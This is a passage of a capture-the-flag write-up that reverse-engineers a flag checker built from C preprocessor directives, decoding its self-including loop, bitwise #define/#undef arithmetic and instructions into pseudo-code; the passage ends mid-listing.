<p>Going back to the top of the file (line 16), we first see a list of definition of flag characters from <code class="language-plaintext highlighter-rouge">FLAG_0</code> to <code class="language-plaintext highlighter-rouge">FLAG_26</code>, in total of 27 characters. It’s then followed by a list of definition of characters used in the flag string (line 45), which includes all 26 English letters, in both lowercase and uppercase, and 10 numeral digits, plus underscore <code class="language-plaintext highlighter-rouge">_</code> and brackets <code class="language-plaintext highlighter-rouge">{</code> and <code class="language-plaintext highlighter-rouge">}</code>, all defined to be their ASCII values. In total we have 65 characters possibly be used in the flag string. The number of combinations for all possible flags is \(65^{27}\), which is apparently impossible to brute-force.</p>

<p>The next section is a list of definitions (line 111), including a variable <code class="language-plaintext highlighter-rouge">S</code> and bunch of variables starts with <code class="language-plaintext highlighter-rouge">ROM_</code>. Without any further context, we can assume that this is the part where the memory is defined for this program, where <code class="language-plaintext highlighter-rouge">ROM_xxxxxxxx_y</code> means the <code class="language-plaintext highlighter-rouge">y</code>th bit of the address <code class="language-plaintext highlighter-rouge">0bxxxxxxxx</code>. The pre-defined memory values lies within the range of <code class="language-plaintext highlighter-rouge">0b00000000 - 0b01111111</code> (0x0 - 0x7F), and the flag string is stored in <code class="language-plaintext highlighter-rouge">0b10000000 - 0b10011010</code> (0x80 - 0x9A).</p>

<p>It is also from this part (line 840) we can tell that our assumption above is correct. Furthermore, we can see that the <code class="language-plaintext highlighter-rouge">0</code>th bit of each address in <code class="language-plaintext highlighter-rouge">ROM</code> is the least-significant bit, and the <code class="language-plaintext highlighter-rouge">7</code>th is the most-significant one. A code snippet like this</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if FLAG_0 &amp; (1&lt;&lt;2)
#define ROM_10000000_2 1
#else
#define ROM_10000000_2 0
#endif
</span></code></pre></div></div>

<p>checks the second bit of <code class="language-plaintext highlighter-rouge">FLAG_0</code> and store the value into <code class="language-plaintext highlighter-rouge">ROM_10000000_2</code>.</p>

<p>The next five lines (line 1920-1924) defines some macro functions. We can see that function <code class="language-plaintext highlighter-rouge">LD(x, y)</code> is the same as <code class="language-plaintext highlighter-rouge">ROM_x_y</code>, meaning that this <code class="language-plaintext highlighter-rouge">LD</code> loads the <code class="language-plaintext highlighter-rouge">y</code>th bit from address <code class="language-plaintext highlighter-rouge">x</code> in <code class="language-plaintext highlighter-rouge">ROM</code>.  The function <code class="language-plaintext highlighter-rouge">MA(l0, l1, l2, l3, l4, l5, l6, l7)</code> concatenates bit <code class="language-plaintext highlighter-rouge">l0</code> to <code class="language-plaintext highlighter-rouge">l7</code> together, but in reverse order, meaning <code class="language-plaintext highlighter-rouge">MA(1, 1, 1, 1, 0, 0, 0, 1)</code> will give out string <code class="language-plaintext highlighter-rouge">10001111</code>. Here, we can’t be sure that <code class="language-plaintext highlighter-rouge">l0</code> to <code class="language-plaintext highlighter-rouge">l7</code> are 0, 1 values only yet, but it will become apparent in the following analysis. The final macro <code class="language-plaintext highlighter-rouge">l</code> is simply a short hand to the above <code class="language-plaintext highlighter-rouge">MA</code> function called on <code class="language-plaintext highlighter-rouge">l0</code> to <code class="language-plaintext highlighter-rouge">l7</code>.</p>

<h3 id="code-formatting">Code Formatting</h3>

<p>The next part starting from line 1926 is very messy, mainly there’re a lot of <code class="language-plaintext highlighter-rouge">#if...</code> instructions without proper indentation, make it really hard to read. We wrote a easy formatter:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">cpp.c</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">r</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">in_file</span><span class="p">,</span> \
     <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">cpp.formatted.c</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">w</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">out_file</span><span class="p">:</span>
    <span class="n">indent</span> <span class="o">=</span> <span class="sh">''</span>
    <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">in_file</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">line</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="sh">'</span><span class="s">#if</span><span class="sh">'</span><span class="p">):</span>
            <span class="nf">print</span><span class="p">(</span><span class="n">indent</span> <span class="o">+</span> <span class="n">line</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="sh">''</span><span class="p">,</span> <span class="nb">file</span><span class="o">=</span><span class="n">out_file</span><span class="p">)</span>
            <span class="n">indent</span> <span class="o">+=</span> <span class="sh">'</span><span class="s">  </span><span class="sh">'</span>
        <span class="k">elif</span> <span class="n">line</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="sh">'</span><span class="s">#else</span><span class="sh">'</span><span class="p">):</span>
            <span class="nf">print</span><span class="p">(</span><span class="n">indent</span><span class="p">[:</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="n">line</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="sh">''</span><span class="p">,</span> <span class="nb">file</span><span class="o">=</span><span class="n">out_file</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">line</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="sh">'</span><span class="s">#endif</span><span class="sh">'</span><span class="p">):</span>
                <span class="n">indent</span> <span class="o">=</span> <span class="n">indent</span><span class="p">[:</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
            <span class="nf">print</span><span class="p">(</span><span class="n">indent</span> <span class="o">+</span> <span class="n">line</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="sh">''</span><span class="p">,</span> <span class="nb">file</span><span class="o">=</span><span class="n">out_file</span><span class="p">)</span>
</code></pre></div></div>

<p>The end result looks like this</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if S == 3
</span>  <span class="cp">#undef S
</span>  <span class="cp">#define S 4
</span>  <span class="cp">#undef c
</span>  <span class="cp">#ifndef R0
</span>    <span class="cp">#ifndef Z0
</span>      <span class="cp">#ifdef c
</span>        <span class="cp">#define R0
</span>        <span class="cp">#undef c
</span>      <span class="cp">#endif
</span>    <span class="cp">#else
</span>      <span class="cp">#ifndef c
</span>        <span class="cp">#define R0
</span><span class="p">[...]</span>
</code></pre></div></div>

<p>Which is much more intelligible.</p>

<h3 id="structure-overview">Structure Overview</h3>

<p>This above part looks like the main program, so we’ll skip it for now. Jumping all the way to the bottom (line 6217), we see that the code includes itself twice if <code class="language-plaintext highlighter-rouge">S != -1</code>. We also see that there’s a pre-defined macro <code class="language-plaintext highlighter-rouge">__INCLUDE_LEVEL__</code> used. It is a macro that starts at 0, and increase by 1 for each level an <code class="language-plaintext highlighter-rouge">#include</code> is expanded. This means the code expands differently at different include level.</p>

<p>Overall structure of the file can be seen as:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (__INCLUDE_LEVEL__ == 0) {
  flag_str := "CTF{write_flag_here_please}"

  /* define character ascii value */
  
  MEMORY[0x0 - 0x7F] := {...}
  
  copy(&amp;MEMORY[0x80], flag_str)
}

if (__INCLUDE_LEVEL__ &gt; 12) {
  // main program
} else {
  if (S != -1) {
  	#include self
  }
  if (S != -1) {
  	#include self
  }
}
</code></pre></div></div>

<h2 id="reversing-the-program">Reversing the Program</h2>

<p>For the main program (line 1927 - 6215), we can see a pattern that looks like this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if S == [x]
</span>  <span class="cp">#undef S
</span>  <span class="cp">#define S [x+1]
</span>  <span class="p">[...]</span>
<span class="cp">#endif
#if S == [x+1]
</span>  <span class="cp">#undef S
</span>  <span class="cp">#define S [x+2]
</span><span class="p">[...]</span>
</code></pre></div></div>

<p>where <code class="language-plaintext highlighter-rouge">x</code> ranges from 0 to 58. Experiences tell us that <code class="language-plaintext highlighter-rouge">S</code> should be the instruction pointer, and it by defaults go to the next one. However, the preprocessor only goes in one direction, so how does this program <code class="language-plaintext highlighter-rouge">jmp</code>? Or in other words, what happens if the program <code class="language-plaintext highlighter-rouge">#define S [x]</code> where <code class="language-plaintext highlighter-rouge">x</code> is less than the current <code class="language-plaintext highlighter-rouge">S</code> value?</p>

<p>This is where that two <code class="language-plaintext highlighter-rouge">#include &lt;cpp.c&gt;</code> comes into play. The code include itself twice when <code class="language-plaintext highlighter-rouge">__INCLUDE_LEVEL__</code> is less than 12 and <code class="language-plaintext highlighter-rouge">S != -1</code>. From there we know two things,</p>

<ol>
  <li>Program ends when <code class="language-plaintext highlighter-rouge">S</code>, the instruction pointer, <code class="language-plaintext highlighter-rouge">== -1</code></li>
  <li>The program <em>jmp</em> by setting <code class="language-plaintext highlighter-rouge">S</code> and executes the corresponding instruction in the next <code class="language-plaintext highlighter-rouge">#include</code> part of the same code, if the new <code class="language-plaintext highlighter-rouge">S</code> is less than the current <code class="language-plaintext highlighter-rouge">S</code>.</li>
</ol>

<hr />

<p>Since <code class="language-plaintext highlighter-rouge">S</code>’s initial value is <code class="language-plaintext highlighter-rouge">0</code>, we followed the execution path and tried to manually figure out what each instruction means:</p>

<p><code class="language-plaintext highlighter-rouge">S == 0</code>: A single <code class="language-plaintext highlighter-rouge">#define S 24</code> means <code class="language-plaintext highlighter-rouge">JMP 24</code>.<br />
<code class="language-plaintext highlighter-rouge">S == 24</code>: What’s going on? Why there’s a lot of <code class="language-plaintext highlighter-rouge">#undef</code>?</p>

<h4 id="s--30">S == 30</h4>

<p>Ignoring the confusion, I followed the path all the way to <code class="language-plaintext highlighter-rouge">S == 30</code> and see a humongous body for this line of instruction.</p>

<blockquote>
  <p>I originally thought this was somehow a form of obfuscation, so I wrote a static analyzer for this program and see if I can rip away some of the things. Spent a lot of time on this, later realizing it was heading towards a wrong direction.</p>
</blockquote>

<p>We see something look like this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#ifndef Bx
</span>  <span class="cp">#ifndef Ix
</span>    <span class="cp">#ifdef c
</span>      <span class="cp">#define Bx
</span>      <span class="cp">#undef c
</span>    <span class="cp">#endif
</span>  <span class="cp">#else
</span>    <span class="cp">#ifndef c
</span>      <span class="cp">#define Bx
</span>      <span class="cp">#undef c
</span>    <span class="cp">#endif
</span>  <span class="cp">#endif
#else
</span>  <span class="cp">#ifndef Ix
</span>    <span class="cp">#ifdef c
</span>      <span class="cp">#undef Bx
</span>      <span class="cp">#define c
</span>    <span class="cp">#endif
</span>  <span class="cp">#else
</span>    <span class="cp">#ifndef c
</span>      <span class="cp">#undef Bx
</span>      <span class="cp">#define c
</span>    <span class="cp">#endif
</span>  <span class="cp">#endif
#endif
</span></code></pre></div></div>

<p>for <code class="language-plaintext highlighter-rouge">x</code> ranging 0 to 7. Let’s make it clearer by constructing a table:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center">Bx</th>
      <th style="text-align: center">Ix</th>
      <th style="text-align: center">c</th>
      <th style="text-align: center">Bx_after</th>
      <th style="text-align: center">c_after</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
    </tr>
    <tr>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center"><strong>Y</strong></td>
      <td style="text-align: center"><strong>N</strong></td>
    </tr>
    <tr>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center"><strong>Y</strong></td>
      <td style="text-align: center"><strong>N</strong></td>
    </tr>
    <tr>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
    </tr>
    <tr>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
    </tr>
    <tr>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center"><strong>N</strong></td>
      <td style="text-align: center"><strong>Y</strong></td>
    </tr>
    <tr>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center"><strong>N</strong></td>
      <td style="text-align: center"><strong>Y</strong></td>
    </tr>
    <tr>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
    </tr>
  </tbody>
</table>

<p>Where <code class="language-plaintext highlighter-rouge">N</code> means that the variable is undefined and <code class="language-plaintext highlighter-rouge">Y</code> means it is defined. <code class="language-plaintext highlighter-rouge">Bx_after</code> is the result of <code class="language-plaintext highlighter-rouge">Bx</code> after running this instruction. Notice that 4 rows are marked <strong>bold</strong> for <code class="language-plaintext highlighter-rouge">Bx_after</code> and <code class="language-plaintext highlighter-rouge">c_after</code>, meaning their value changed. For all other initial value of <code class="language-plaintext highlighter-rouge">Bx</code>, <code class="language-plaintext highlighter-rouge">Ix</code> and <code class="language-plaintext highlighter-rouge">c</code>, they matched none of the branches, so their value doesn’t change.</p>

<p>It is then clear that this is <code class="language-plaintext highlighter-rouge">B += I</code> in binary, where <code class="language-plaintext highlighter-rouge">c</code> is the carry bit. The only part that is confusing is actually how a bit is represented.</p>

<h3 id="define-and-undef-a-bit">#define and #undef a Bit</h3>

<p>When we first analyze this code, all values are set using <code class="language-plaintext highlighter-rouge">#define [variable] [value]</code>. This applies to the <code class="language-plaintext highlighter-rouge">flag</code> value, the <code class="language-plaintext highlighter-rouge">MEM</code> section and <code class="language-plaintext highlighter-rouge">S</code> the instruction pointer. However, things changed a bit in the main program. Here, a bit is set or unset using <code class="language-plaintext highlighter-rouge">#define</code> and <code class="language-plaintext highlighter-rouge">#undef</code>, and checked using <code class="language-plaintext highlighter-rouge">#ifdef</code> and <code class="language-plaintext highlighter-rouge">#ifndef</code> respectively—the existence of the macro defines if the bit is 1 or 0. So, for a code snippet like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define B0
#undef  B1
#define B2
#undef  B3
#undef  B4
#define B5
#define B6
#define B7
</code></pre></div></div>

<p>If we consider <code class="language-plaintext highlighter-rouge">B</code> as a signed 8-bit number, then it is equivalent of setting <code class="language-plaintext highlighter-rouge">B = 0b11100101 (-27)</code>.</p>

<p>With this knowledge, we can finally start out reversing process.</p>

<hr />

<p>Continue where we left off:</p>

<p>24: <code class="language-plaintext highlighter-rouge">I = 0</code><br />
25: <code class="language-plaintext highlighter-rouge">M = 0</code><br />
26: <code class="language-plaintext highlighter-rouge">N = 1</code><br />
27: <code class="language-plaintext highlighter-rouge">P = 0</code><br />
28: <code class="language-plaintext highlighter-rouge">Q = 0</code><br />
29: <code class="language-plaintext highlighter-rouge">B = -27</code><br />
30: <code class="language-plaintext highlighter-rouge">B += I</code> as we just analyzed.</p>

<h4 id="s--31">S == 31</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#ifndef B0
  #ifndef B1
    #ifndef B2
      #ifndef B3
        #ifndef B4
          #ifndef B5
            #ifndef B6
              #ifndef B7
                #undef S
                #define S 56
              #endif
            #endif
          #endif
        #endif
      #endif
    #endif
  #endif
#endif
</code></pre></div></div>

<p>By our analysis above, this means that if <code class="language-plaintext highlighter-rouge">B == 0</code>, we will jump to instruction 56.</p>

<p>Therefore, instruction 31 is <code class="language-plaintext highlighter-rouge">IF B == 0 THEN JMP 56</code>.</p>

<hr />

<p>32: <code class="language-plaintext highlighter-rouge">B = 0x80</code><br />
33: <code class="language-plaintext highlighter-rouge">B += I</code>, same as instruction 30</p>

<h4 id="s--34">S == 34</h4>

<p>There are two parts in this instruction, let’s check them out one by one:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#undef lx
#ifdef Bx
  #define lx 1
#else
  #define lx 0
#endif
</code></pre></div></div>

<p>for <code class="language-plaintext highlighter-rouge">x</code> ranging 0 to 7. It is easy to recognize that this is checking each bit of <code class="language-plaintext highlighter-rouge">B</code>, and set <code class="language-plaintext highlighter-rouge">l_x</code> to the literal value of 1 or 0.</p>

<p>The next part looks like this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if LD(l, x)
</span>  <span class="cp">#define Ax
#else
</span>  <span class="cp">#undef Ax
#endif
</span></code></pre></div></div>

<p>for <code class="language-plaintext highlighter-rouge">x</code> ranging 0 to 7. As we have analyzed before, <code class="language-plaintext highlighter-rouge">LD(l, x)</code> is the function to load <code class="language-plaintext highlighter-rouge">MEM</code> portion using address in <code class="language-plaintext highlighter-rouge">l</code> and the <code class="language-plaintext highlighter-rouge">x</code>th bit. The <code class="language-plaintext highlighter-rouge">#if</code> is to convert literal 0 and 1 in memory back to the bit representation (defined or undefined) in the program.</p>

<p>Take the above together, we see that this is a memory load operation, where it takes <code class="language-plaintext highlighter-rouge">B</code> as a memory address and set the resulting value to <code class="language-plaintext highlighter-rouge">A</code>. Therefore, instruction 34 is <code class="language-plaintext highlighter-rouge">A = LOAD(B)</code>.</p>

<hr />

<p>35: <code class="language-plaintext highlighter-rouge">B = LOAD(I)</code>, similar to instruction 34.<br />
36: <code class="language-plaintext highlighter-rouge">R = 1</code><br />
37: <code class="language-plaintext highlighter-rouge">JMP 12</code></p>

<p>12: <code class="language-plaintext highlighter-rouge">X = 1</code><br />
13: <code class="language-plaintext highlighter-rouge">Y = 0</code><br />
14: <code class="language-plaintext highlighter-rouge">IF X == 0 THEN JMP 22</code>, similar to instruction 31.</p>

<h4 id="s--15">S == 15</h4>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#ifdef Xx
</span>  <span class="cp">#define Zx
#else
</span>  <span class="cp">#undef Zx
#endif
</span></code></pre></div></div>

<p>for <code class="language-plaintext highlighter-rouge">x</code> ranging 0 to 7. It is easy to recognize that this is <em>copying</em> or assigning each bit of <code class="language-plaintext highlighter-rouge">X</code> to <code class="language-plaintext highlighter-rouge">Z</code>, so this is an equal operation. Instruction 15 is <code class="language-plaintext highlighter-rouge">Z = X</code>.</p>

<h4 id="s--16">S == 16</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#ifdef Zx
  #ifndef Bx
    #undef Zx
  #endif
#endif
</code></pre></div></div>

<p>for <code class="language-plaintext highlighter-rouge">x</code> ranging 0 to 7. From the syntax of it, we can see that <code class="language-plaintext highlighter-rouge">Zx</code> will be 0 when <code class="language-plaintext highlighter-rouge">Bx</code> is 0.</p>

<blockquote>
  <p>You can draw out a table for this, but I’ll cut to the chase…</p>
</blockquote>

<p>Which means that this instruction is a bitwise-and operation, <code class="language-plaintext highlighter-rouge">Z = Z &amp; B</code>.</p>

<hr />

<p>17: <code class="language-plaintext highlighter-rouge">IF Z == 0 THEN JMP 19</code><br />
18: <code class="language-plaintext highlighter-rouge">Y += A</code><br />
19: <code class="language-plaintext highlighter-rouge">X += X</code><br />
20: <code class="language-plaintext highlighter-rouge">A += A</code><br />
21: <code class="language-plaintext highlighter-rouge">JMP 14</code></p>

<p>22: <code class="language-plaintext highlighter-rouge">A = Y</code><br />
23: <code class="language-plaintext highlighter-rouge">JMP 1</code></p>

<h4 id="s--1">S == 1</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#ifdef Rx
  #undef Rx
#else
  #define Rx
#endif
</code></pre></div></div>

<p>Should be pretty obvious that this is a bitwise-not, <code class="language-plaintext highlighter-rouge">R = ~R</code>.</p>

<hr />

<p>2: <code class="language-plaintext highlighter-rouge">Z = 1</code><br />
3: <code class="language-plaintext highlighter-rouge">R += Z</code><br />
4: <code class="language-plaintext highlighter-rouge">R += Z</code><br />
5: <code class="language-plaintext highlighter-rouge">IF R == 0 THEN JMP 38</code><br />
6: <code class="language-plaintext highlighter-rouge">R += Z</code><br />
7: <code class="language-plaintext highlighter-rouge">IF R == 0 THEN JMP 59</code><br />
8: <code class="language-plaintext highlighter-rouge">R += Z</code><br />
9: <code class="language-plaintext highlighter-rouge">IF R == 0 THEN JMP 59</code><br />
10: <code class="language-plaintext highlighter-rouge">#ERROR BUG</code><br />
11: <code class="language-plaintext highlighter-rouge">EXIT</code>, as we talked about <code class="language-plaintext highlighter-rouge">S == -1</code> means ending the program.</p>

<p>38: <code class="language-plaintext highlighter-rouge">O = M</code><br />
39: <code class="language-plaintext highlighter-rouge">O += N</code><br />
40: <code class="language-plaintext highlighter-rouge">M = N</code><br />
41: <code class="language-plaintext highlighter-rouge">N = O</code><br />
42: <code class="language-plaintext highlighter-rouge">A += M</code><br />
43: <code class="language-plaintext highlighter-rouge">B = 0x20</code><br />
44: <code class="language-plaintext highlighter-rouge">B += I</code><br />
45: <code class="language-plaintext highlighter-rouge">C = LOAD(B)</code></p>

<h4 id="s--46">S == 46</h4>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#ifdef Cx
</span>  <span class="cp">#ifdef Ax
</span>    <span class="cp">#undef Ax
</span>  <span class="cp">#else
</span>    <span class="cp">#define Ax
</span>  <span class="cp">#endif
#endif
</span></code></pre></div></div>

<p>Let’s draw a table for this:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center">Cx</th>
      <th style="text-align: center">Ax</th>
      <th style="text-align: center">Ax after</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center">0</td>
      <td style="text-align: center">0</td>
      <td style="text-align: center">0</td>
    </tr>
    <tr>
      <td style="text-align: center">0</td>
      <td style="text-align: center">1</td>
      <td style="text-align: center">1</td>
    </tr>
    <tr>
      <td style="text-align: center">1</td>
      <td style="text-align: center">0</td>
      <td style="text-align: center"><strong>1</strong></td>
    </tr>
    <tr>
      <td style="text-align: center">1</td>
      <td style="text-align: center">1</td>
      <td style="text-align: center"><strong>0</strong></td>
    </tr>
  </tbody>
</table>

<p>The remaining case when <code class="language-plaintext highlighter-rouge">Cx</code> is not set, <code class="language-plaintext highlighter-rouge">Ax</code> will keep unchanged. So we can say that</p>

\[A_x = \begin{cases}
      A_x &amp; \text{if}\ C_x=0 \\
      \neg A_x &amp; \text{if}\ C_x=1 \\
    \end{cases} \implies A_x = A_x \oplus C_x\]

<p>Meaning instruction 46 is exclusive-or operation, <code class="language-plaintext highlighter-rouge">A ^= C</code>.</p>

<hr />

<p>47: <code class="language-plaintext highlighter-rouge">P += A</code><br />
48: <code class="language-plaintext highlighter-rouge">B = 0x40</code><br />
49: <code class="language-plaintext highlighter-rouge">B += I</code><br />
50: <code class="language-plaintext highlighter-rouge">A = LOAD(B)</code><br />
51: <code class="language-plaintext highlighter-rouge">A ^= P</code>, similar to instruction 46</p>

<h4 id="s--52">S == 52</h4>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#ifndef Qx
</span>  <span class="cp">#ifdef Ax
</span>    <span class="cp">#define Qx
</span>  <span class="cp">#endif
#endif
</span></code></pre></div></div>

<p>Very similar to instruction 16, but this time we can see <code class="language-plaintext highlighter-rouge">Qx</code> will be 1 when <code class="language-plaintext highlighter-rouge">Ax</code> is 1, and otherwise unaffected.</p>

<blockquote>
  <p>Again you can draw out a table for this.</p>
</blockquote>

<p>Which means that this instruction is a bitwise-or operation, <code class="language-plaintext highlighter-rouge">Q = Q | A</code>.</p>

<hr />

<p>53: <code class="language-plaintext highlighter-rouge">A = 1</code><br />
54: <code class="language-plaintext highlighter-rouge">I += A</code><br />
55: <code class="language-plaintext highlighter-rouge">JMP 29</code></p>

<p>56: <code class="language-plaintext highlighter-rouge">IF Q == 0 JMP 58</code><br />
57: <code class="language-plaintext highlighter-rouge">#ERROR "INVALID FLAG"</code><br />
58: <code class="language-plaintext highlighter-rouge">EXIT</code></p>

<h3 id="rewrite-the-program">Rewrite the Program</h3>

<p>Since we now have analyzed every single instruction of the program, let’s write a pseudo program for this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">I</span> <span class="o">=</span> <span class="mi">0</span>                   <span class="c1">// 24</span>
<span class="n">M</span> <span class="o">=</span> <span class="mi">0</span>                   <span class="c1">// 25</span>
<span class="n">N</span> <span class="o">=</span> <span class="mi">1</span>                   <span class="c1">// 26</span>
<span class="n">P</span> <span class="o">=</span> <span class="mi">0</span>                   <span class="c1">// 27</span>
<span class="n">Q</span> <span class="o">=</span> <span class="mi">0</span>                   <span class="c1">// 28</span>

<span class="k">for</span> <span class="p">{</span>
  <span class="n">B</span> <span class="o">=</span> <span class="o">-</span><span class="mi">27</span>               <span class="c1">// 29</span>
  <span class="n">B</span> <span class="o">=</span> <span class="n">B</span> <span class="o">+</span> <span class="n">I</span>             <span class="c1">// 30</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">B</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>    <span class="c1">// 31</span>
  <span class="n">B</span> <span class="o">=</span> <span class="mh">0x80</span>              <span class="c1">// 32</span>
  <span class="n">B</span> <span class="o">=</span> <span class="n">B</span> <span class="o">+</span> <span class="n">I</span>             <span class="c1">// 33</span>
  <span class="n">A</span> <span class="o">=</span> <span class="n">LOAD</span><span class="p">(</span><span class="n">B</span><span class="p">)</span>           <span class="c1">// 34</span>
  <span class="n">B</span> <span class="o">=</span> <span class="n">LOAD</span><span class="p">(</span><span class="n">I</span><span class="p">)</span>           <span class="c1">// 35</span>
  <span class="n">R</span> <span class="o">=</span> <span class="mi">1</span>                 <span class="c1">// 36</span>

  <span class="n">X</span> <span class="o">=</span> <span class="mi">1</span>                 <span class="c1">// 12</span>
  <span class="n">Y</span> <span class="o">=</span> <span class="mi">0</span>                 <span class="c1">// 13</span>
  <span class="k">for</span> <span class="n">X</span> <span class="o">!=</span> <span class="mi">0</span> <span class="p">{</span>          <span class="c1">// 14</span>
    <span class="n">Z</span> <span class="o">=</span> <span class="n">X</span>               <span class="c1">// 15</span>
    <span class="n">Z</span> <span class="o">=</span> <span class="n">Z</span> <span class="o">&amp;</span> <span class="n">B</span>           <span class="c1">// 16</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">Z</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>       <span class="c1">// 17</span>
      <span class="n">Y</span> <span class="o">+=</span> <span class="n">A</span>            <span class="c1">// 18</span>
    <span class="p">}</span>                   <span class="c1">// 19</span>
    <span class="n">X</span> <span class="o">+=</span> <span class="n">X</span>              <span class="c1">// 20</span>
    <span class="n">A</span> <span class="o">+=</span> <span class="n">A</span>              <span class="c1">// 21</span>
  <span class="p">}</span>
  <span class="n">A</span> <span class="o">=</span> <span class="n">Y</span>                 <span class="c1">// 22</span>
  
  <span class="n">R</span> <span class="o">=</span> <span class="o">~</span><span class="n">R</span>                <span class="c1">// 1</span>
  <span class="n">Z</span> <span class="o">=</span> <span class="mi">1</span>                 <span class="c1">// 2</span>
  <span class="n">R</span> <span class="o">+=</span> <span class="n">Z</span>                <span class="c1">// 3</span>
  <span class="n">R</span> <span class="o">+=</span> <span class="n">Z</span>                <span class="c1">// 4</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">R</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">abort</span><span class="p">()</span>   <span class="c1">// 5 - 11 (won't reach here)</span>
  
  <span class="n">O</span> <span class="o">=</span> <span class="n">M</span>                 <span class="c1">// 38</span>
  <span class="n">O</span> <span class="o">+=</span> <span class="n">N</span>                <span class="c1">// 39</span>
  <span class="n">M</span> <span class="o">=</span> <span class="n">N</span>                 <span class="c1">// 40</span>
  <span class="n">N</span> <span class="o">=</span> <span class="n">O</span>                 <span class="c1">// 41</span>
  <span class="n">A</span> <span class="o">+=</span> <span class="n">M</span>                <span class="c1">// 42</span>
  <span class="n">B</span> <span class="o">=</span> <span class="mh">0x20</span>              <span class="c1">// 43</span>
  <span class="n">B</span> <span class="o">+=</span> <span class="n">I</span>                <span class="c1">// 44</span>
  <span class="n">C</span> <span class="o">=</span> <span class="n">LOAD</span><span class="p">(</span><span class="n">B</span><span class="p">)</span>           <span class="c1">// 45</span>
  <span class="n">A</span> <span class="o">^=</span> <span class="n">C</span>                <span class="c1">// 46</span>
  <span class="n">P</span> <span class="o">+=</span> <span class="n">A</span>                <span class="c1">// 47</span>

  <span class="n">B</span> <span class="o">=</span> <span class="mh">0x40</span>              <span class="c1">// 48</span>
  <span class="n">B</span> <span class="o">+=</span> <span class="n">I</span>                <span class="c1">// 49</span>
  <span class="n">A</span> <span class="o">=</span> <span class="n">LOAD</span><span class="p">(</span><span class="n">B</span><span class="p">)</span>           <span class="c1">// 50</span>
  <span class="n">A</span> <span class="o">^=</span> <span class="n">P</span>                <span class="c1">// 51</span>
  <span class="n">Q</span> <span class="o">|=</span> <span class="n">A</span>                <span class="c1">// 52</span>
  <span class="n">A</span> <span class="o">=</span> <span class="mi">1</span>                 <span class="c1">// 53</span>
  <span class="n">I</span> <span class="o">+=</span> <span class="n">A</span>                <span class="c1">// 54</span>
<span class="p">}</span>

<span class="k">if</span> <span class="p">(</span><span class="n">Q</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>           <span class="c1">// 56</span>
